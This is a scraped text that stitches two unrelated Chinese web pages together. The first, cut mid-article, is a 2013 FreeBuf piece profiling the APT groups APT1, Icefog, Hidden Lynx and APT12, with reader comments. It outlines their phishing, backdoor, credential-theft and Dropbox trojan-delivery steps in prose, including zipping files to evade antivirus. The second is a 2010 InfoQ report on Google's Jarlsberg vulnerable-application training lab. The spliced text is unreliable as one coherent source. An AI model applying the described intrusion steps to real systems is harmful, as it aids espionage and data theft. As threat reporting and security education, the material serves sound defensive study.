下面我们可以通过一张组织结构图来了解61398部队在中国军队中的地位,可以毫不谦虚地讲,APT1应该是中国黑客组织中的“大哥大”。

2.窃密对象

APT1所瞄准的大多是以英语为主要工作语言的机构。APT1受害机构中整整87%总部设在以英语为母语的国家,其中115 家在美国,7家在加拿大与英国。剩下的19个受害者,17 家以英语为主要工作语言。APT1从受害机构盗取数据的范围很广。他们所盗取的数据类型有:

·产品开发及应用,包括测试结果资料、系统设计、产品手册、构件清单、以及相关模拟技术; ·制造工艺,例如专有生产过程描述、标准以及排放管理程序; ·商业计划,例如合同谈判立场定位与产品报价、法律事件、兼并、合资、收购等; ·政策定位与分析,例如白皮书、涉及高层人员的会议议程与纪要; ·高层雇员的电子邮件; ·用户密码以及网络架构资料。

3.攻击手法

第一步,通过发送鱼叉式钓鱼邮件引诱对方点击附件,一旦有人打开就装上后门软件。

第二部,在通信过程中,使用HTTP之外其他一些协议来模仿合法的互联网数据流,从而达到隐藏通讯的目的。

第三部,利用公开的工具软件来窃取被侵入系统的密码哈希值,以获取合法用户的密码,从而提升权限。

第四部,利用工具进行系统和网络环境侦查活动,展开内部侦查,获取更多有价值信息。

第五部,通过安装后门、获取凭证和登录门户网站等措施维持阵地,保障从外部持续、长期对侵入网络环境里关键系统的控制。

第六步,在网络中寻窃取机密文件,压缩打包,利用FTP进行传输。

NO.2 Icefog(冰雾)—打响网络战中的“游击战”

知名度:★★★★ 攻击技巧:★★★★ 攻击范围:★★★ 曝光单位:卡巴斯基

1.背景介绍

“Icefog”又是一个据称有中国背景的APT黑客组织,其活动追溯至2011年,攻击对象主要为日本和韩国。受害单位组合主要包括政府机构、军队承包商、海洋和造船公司、电信运营商、业界和高技术公司以及主流媒体。该组织目的性非常明确,擅长“游击战”(H&R),在获取机密信息之后会立即撤离,不留任何痕迹。由于卡巴斯基并没有直接拿出该组织与中国政府或军队有关的证据,因此并没有引起国内外媒体广泛关注。但从黑客行为、使用的工具以及攻击手段分析,不得不说与“中国”能够扯上关系。

2.窃密对象

卡巴斯基研究人员指出,Icefog的攻击目标主要位于韩国与日本。受到攻击的单位有韩国防工业承包商Lig Nex1以及Selectron公司,大宇造船公司(DSME Tech),韩进重工(Hanjin Heavy Industries),电信运营商韩国电信(Korea Telecom,),媒体公司富士电视(Fuji TV)以及日中经济协会。

3.攻击手法

Icefog攻击主要手段与APT1类似,主要是基于office、java漏洞的邮件和网页钓鱼,并结合社会工程学,对目标进行有组织、有目的和有规划的网络攻击。其中需要注意的是,该组织拥有大量MacOSX系统的漏洞库,而现在安全公司和大部分安全软件对MacOSX系统应用软件的漏洞监测并不到位,因此使用MacOSX系统的个人和组织应尤其注意。

NO.3 “隐匿山猫”(Hidden Lynx)—躲在隐形斗篷下的猫

知名度: ★★★ 攻击技巧:★★★★★ 攻击范围: ★★★★ 曝光单位:赛门铁克

1.背景介绍

“隐匿山猫”组织是一支具有先进网络能力的专业黑客组织。他们曾经在水坑式钓鱼攻击中(watering hole)突破了Bit9用于标记恶意软件的数字签名。该组织采用“雇佣黑客作战”的方式,对广泛的政府和公司展开攻击。该组织能够在同一时间发动多线攻击,利用最先进的攻击技巧入侵世界上防护最坚固的单位,同时还能在短时间内改变战术从而实现既定目标。针对不同的目标他们会研究不同的木马,Backdoor.Moudoor被用做攻击大型公司,而Trojan.Naid则是攻击高价值目标时所用。该组织参与了2009年针对美国Google、Adobe等大型公司发起的网络攻击行动—“极光行动”(Operation Aurora)。

2.窃密对象

2011年11月以来,全世界上百个组织声称遭到了“隐匿山猫”的攻击。该组织攻击范围从商业机构到各级政府,排名前十的领域为:金融、教育、政府、信息、医疗、工程、法律、媒体、非政府组织和国防企业。受到影响的国家有美国(52.78%)、台湾(15.53%)、中国(9%)、香港、日本、加拿大、德国、俄罗斯等。

·商业机密—该组织擅长攻击银行金融监管机构和商业组织,从中窃取机密信息,为涉及收购、股票交易的谈判提供重要情报参考。

·科技机密—该组织还擅长攻击政府承包商,从中获取最新科学技术,以填补本国与外国之间的科技差距。

3.攻击手法

“隐匿山猫”主要攻击方式也是通过漏洞安装木马,但其使用的木马——Backdoor.Moudoor、Trojan.Naid、Backdoor.Vasport、Backdoor.Boda和Trojan.Hydraq可以说是“四大传奇”中技术含量最高的,而且在改变传统鱼叉式攻击转向“水坑式”攻击上,该组织也取得了成功。

NO.4 APT12—神出鬼没的“卡尔克”(Calc)

知名度:★★★★★ 攻击技巧:★★★ 攻击范围: ★★★★★ 曝光单位:纽约时报

1.背景介绍

谈到APT12,自然会让人联想到与中国军方有关联的APT1,而且曼迪昂特一份报告中也指出,“中国有20个类似APT1的黑客组织”,APT12自然就是其中之一。自2012年10月《纽约时报》报导中国高官家族聚敛巨额财富的新闻之后,它的计算机系统遭到了中国黑客长达4个月的攻击,黑客入侵了系统窃取了新闻记者和雇员的密码,这一黑客组织被定义为APT12(Calc Team)。在沉寂了几个月之后,根据安全公司FireEye发布的报告,APT 12再度活跃,攻击者还更新了他们使用的来自Backdoor.APT.Aumlib和Backdoor.APT.Ixeshe恶意程序家族的黑客工具;时隔不久,这一组织又再次对俄罗斯G20峰会成员国发起的大量攻击,欧盟、俄罗斯、韩国等重要经济体的财政和金融部门都遭到了不同程度的攻击。

2.窃密对象

根据该组织历史攻击记录来看,其攻击目标主要为社交媒体、美台政府机构、大型公司和国防承包商。从这些目标中我们可以分析出,该组织主要是为了获取政府敏感文件、世界顶级科技以及经济类情报。

3.攻击手法

与上述三个黑客组织所用的方法有所不同的是,APT12擅长利用Dropbox等云存储工具开展攻击。攻击者通过注册一个攻击对象可能熟悉的Dropbox账号,并在空间里上传绑定了木马的合法文件,通过Dropbox自带的邮件发送功能向受害者发送分享链接,引诱对方下载点击。

综合各大安全公司的分析,APT12攻击流程可分为以下几步。

第一步,搜集攻击对象信息,发现与其联系密切的人员。 第二步,用搜集到的人员信息注册Dropbox(早先版本的Dropbox不需要邮件验证,因此可以利用任何伪造邮箱注册) 第三部,制作木马,将其连接绑定在wordpress等社交平台的博客之中,再利用博客设置转发数据。 第四步,找出一份可能在上述两者之间流通的合法pdf文档,绑定木马。 第五部,压缩PDF为ZIP格式从而绕过杀软查杀,上传至Dropbox。 第六步,利用Dropbox邮件分享功能发送给攻击对象,等待对方点击。

文章参考资料:

http://www.scribd.com/doc/144378692/APT1-61398-Hacker-Report http://www.81tech.com/special/news/27.html http://www.fireeye.com/blog/technical/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html https://community.rapid7.com/community/infosec/blog/2013/08/26/upcoming-g20-summit-fuels-espionage-operations

http://www.cybersquared.com/killing-with-a-borrowed-knife-chaining-core-cloud-service-profile-infrastructure-for-cyber-attacks/

http://www.freebuf.com/news/12884.html http://www.freebuf.com/news/13425.html 2 0 您已评价!

如文中未特别声明转载请注明出自: FreebuF.COM

3 FavoriteLoading收藏该文

相关文章

7条评论 2344人已围观

13条评论 6646人已围观

2条评论 8954人已围观

14条评论 9090人已围观

30条评论 17140人已围观 

7 Comments 发表评论

  1. cad 2013-10-09 1楼

"受到影响的国家有美国(52.78%)、台湾(15.53%)、中国(9%)、香港、日本、加拿大、德国、俄罗斯等。 " 亮了(3) 回复

  1. helen 2013-10-09 2楼

传奇肯定是

黑客动画吧、黑鹰基地、黑客基地、火狐技术联盟 亮了(4) 回复

  1. Jakers (1级) 2013-10-09 3楼

这文章会被和谐吗 亮了(2) 回复

  1. helen的爸爸 2013-10-09 4楼

军方背景 亮了(0) 回复

  1. Freedom 2013-10-09 5楼

已打包 和谐吧 :eek: 应该找冯小刚来拍一部电影 亮了(0) 回复

  1. 123 2013-10-09 6楼

有事没事多报道点别人怎么搞我们的吧 亮了(0) 回复

  1. 123 2013-10-09 7楼

天天瞎扯 还是那句话 中国黑客最NB的是能取美国人贞操于千里之外 亮了(4) 回复 昵称 (必须)您当前尚未登录。登陆?注册

邮箱 必须(保密)

发表言论前,请滑动滚动条解锁 表情插代码插图

正在提交, 请稍候...

/#

取消 有人回复时邮件通知我

本文这些评论亮了捐助我们**Hot Comments**

helen @ 2013-10-09 12:01:17

传奇肯定是 黑客动画吧、黑鹰基地、黑客基地、火狐技术联盟 亮了 (4) 123 @ 2013-10-09 12:43:01

天天瞎扯 还是那句话 中国黑客最NB的是能取美国人贞操于千里之外 亮了 (4) cad @ 2013-10-09 11:49:14

"受到影响的国家有美国(52.78%)、台湾(15.53%)、中国(9%)、香港、日本、加拿大、德国、俄罗斯等。 " 亮了 (3) Jakers @ 2013-10-09 12:02:11

这文章会被和谐吗 亮了 (2)

最新发布**New Posts**

FREEBUF.COM

免责声明 友情链接 我要投稿 关于我们 合作伙伴 联系我们

Copyright @ 2012 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号-1

正在加载中...

攻击Google的Jarlsberg,学习安全漏洞知识

Posted on

攻击Google的Jarlsberg,学习安全漏洞知识

关闭

现有用户:

Email:

密码:

新用户:

InfoQ

直接转至内容 时刻关注企业软件开发领域的变化与创新

En | 中文 | 日本語 | Br

新闻

攻击Google的Jarlsberg,学习安全漏洞知识

作者 Abel Avram译者 侯伯薇发布于 2010年5月8日 下午10时41分 社区架构,Java,.NET,Ruby主题安全标签Google,漏洞

分享 Share|

很多人都想知道黑客是如何攻击并进入到系统的,为了帮助他们,Google创建了一个特殊的名为Jarlsberg 的实验室,其中的应用程序满是安全漏洞,开发者可以利用它以实践的方式学习到潜在的漏洞是什么样的,恶意用户是如何利用这些漏洞的,以及如何做才能免受攻击。

这个实验室是围绕安全漏洞的不同类型来组织的,对于每个漏洞,都有找寻和攻击漏洞的任务可供完成。 该实验室使用了下列三种主要的技术:

  • 黑盒:用户看不到应用程序的源代码,因此他们需要猜测服务器工作的方式,从而设法利用安全漏洞。
  • 白盒:以开源应用的形式提供了源代码(Python)。 用户可以阅读代码,从而找到弱点所在。
  • 灰盒:实验室会给出一些应用程序是如何编写的提示,但不会让用户看到完整的源代码。

Jarlsberg特意使用了大量特性,以扩大应用程序的攻击面。

  • 代码片段中的HTML: 用户可以在代码片段中包含特定的HTML代码。
  • 文件上载: 用户可以向服务器上载文件,例如,在他们的代码片断中包含图片。
  • Web形式的管理: 系统管理员可以使用web界面来管理系统。
  • 新建账号: 用户可以创建属于自己的账号。
  • 模板语言: Jarlsberg模板语言(JTL)是种新语言,它使得开发者可以更容易地编写网页,作为直接与数据库连接的模板。 你可以在

jarlsberg/jtl.py 找到JTL的相关文档。

  • AJAX: Jarlsberg使用AJAX来实现在主页和代码片断页中的刷新。 如果不需要特别关注AJAX内容,你可以忽略Jarlsberg中的AJAX部分。

在Jarlsberg中,你可以找到、利用并最终修复以下安全漏洞:

  • 跨站点脚本攻击(XSS)
  • 跨站点伪造请求攻击(XSRF)
  • 跨站点包含脚本攻击(CSSI)
  • 客户端状态操控攻击
  • 路径模式发掘攻击
  • 拒绝服务攻击(DoS)
  • 执行代码攻击
  • 配置漏洞
  • AJAX漏洞攻击

你可以在本地运行该实验室,以在整个学习过程中完全掌控该实验室;或者也可以在Google的云中作为沙盒实例运行。 该实验室大部分是基于Creative Commons Attribution 3.0协议发布的,但也有一部分是基于Creative Commons Attribution-No Derivative Works 3.0协议发布的,这使得对于大学培训学生或者公司培训员工,让他们理解并保护他们系统免受安全漏洞影响都是很理想的。

查看原文:Learning About Security Vulnerabilities by Hacking Google’s Jarlsberg

分享 Share|

相关厂商内容

Visual Studio 2010专业版Beta 2(Web安装程序,4.4M)

Visual Studio 2010基础版Beta 2(Web安装程序,4.9M)

Visual Studio 2010旗舰版Beta 2(Web安装程序,4.6M)

QClub:微软核心开发团队深入剖析Agile与TFS(4月13日北京,4月15日上海)

创建移动富互联网应用(RIA)的设计技巧

相关赞助商

Visual Studio 2010产品系列提供了工具、技术支持与团队平台组合,激发你的创作灵感,并兼容当前的主流标准。现在就来免费下载试用

2 条回复

关注此讨论回复

google真是NB发表人 Karl MA 发表于 2010年5月9日 下午11时38分 Re: google真是NB发表人 ben jamin_zhou 发表于 2010年5月12日 上午12时48分

按日期倒序排列

返回顶部

google真是NB

2010年5月9日 下午11时38分 发表人 Karl MA rt

回复

返回顶部

Re: google真是NB

2010年5月12日 上午12时48分 发表人 ben jamin_zhou NB ,还怕中国攻击了他的服务器

回复

InfoQ 4月139,277名独立访问用户

Search

特别专题

赞助商链接

IBM精英讲师团招募 每个爱技术乐分享 的人都有机会加入 站在巨人的肩上 IBM将助您攀登新 的职业高峰立刻报名

Visual Studio 2010,支持多显示 器,强大的Web开发 功能,自带大量模板 和Web部件 下载

QClub报名:大规 模数据处理和互联 网应用服务扩展 5月15日北京 免费

SOA白皮书 最佳的SOA实施 策略,阐述ONE集 成解决方案的重 点内容 立刻下载

深度内容

MonoTouch是一个基于Mono的用于开发iPhone应用程序的框架。Bryan Costanich为大家展示了如何使用MonoDevelop IDE来快速地创建基于.NET的iPhone应用程序。

使用JBoss jBPM实现流程访问和执行的授权

能够对流程定义和实例进行访问控制,保证用户只能使用和监视他们被授权的那部分流程,可以极大地让集中化的BPM部署受益。在这篇文章中,Boris Lublinsky给出了如何扩展JBoss jBPM,使之能够定义并支持流程访问授权的方法。

Web发展的源动力是用户的需求,用户的需求又都通过数据的交互来实现,即什么样的交互数据决定着什么样的Web。本演讲介绍了交互数据的格式、几种疑难数据交互的实现(跨页交互、跨域交互、即时交互等)等等。

让Scrum之树长青:战胜紧张和恐惧

团队迅速紧握像Scrum这般简单有效的东西时,与其相关的改变可能引发担忧。了解了本文列举的问题,你就可以为之做好准备。如果自己碰到这些问题,感觉不会那么糟——它们本来就很普遍。

Peter Lubbers在本文中解释了HTML5 Web Sockets是如何与代理服务器交互的,以及Web Sockets通信需要怎样的代理配置或更新。

内存屏障与JVM并发

本文介绍了内存屏障对多线程程序的影响。我们将研究内存屏障与JVM并发机制的关系,如易变量、同步和原子条件式。

开发和架构的界限到底是不是存在呢,似乎有点难以捉摸?有必要竖立这样一个学术区分么? 在两者之间有个平衡,但是你怎么样从一个开发者成为架构师呢?

敏捷宣言的发起者如何完成从技术领导者到文化变革领袖的转变?

虽然敏捷宣言的发起者是由技术主导的,但实际上,软件社区倾心于敏捷的原因却是敏捷宣言注重人性的方面。

联系我们 反馈 feedback@infoq.com Bugs bugs@infoq.com 广告 sales@cn.infoq.com 编辑 editors@cn.infoq.com Twitter http://twitter.com/infoqchina InfoQ讨论组 http://groups.google.com/group/infoqchina

InfoQ.com 及其所有内容,版权所有© 2006-2010 C4Media Inc. InfoQ.com 服务器由 Contegix 提供,我们最信赖的 ISP 合作伙伴。 隐私政策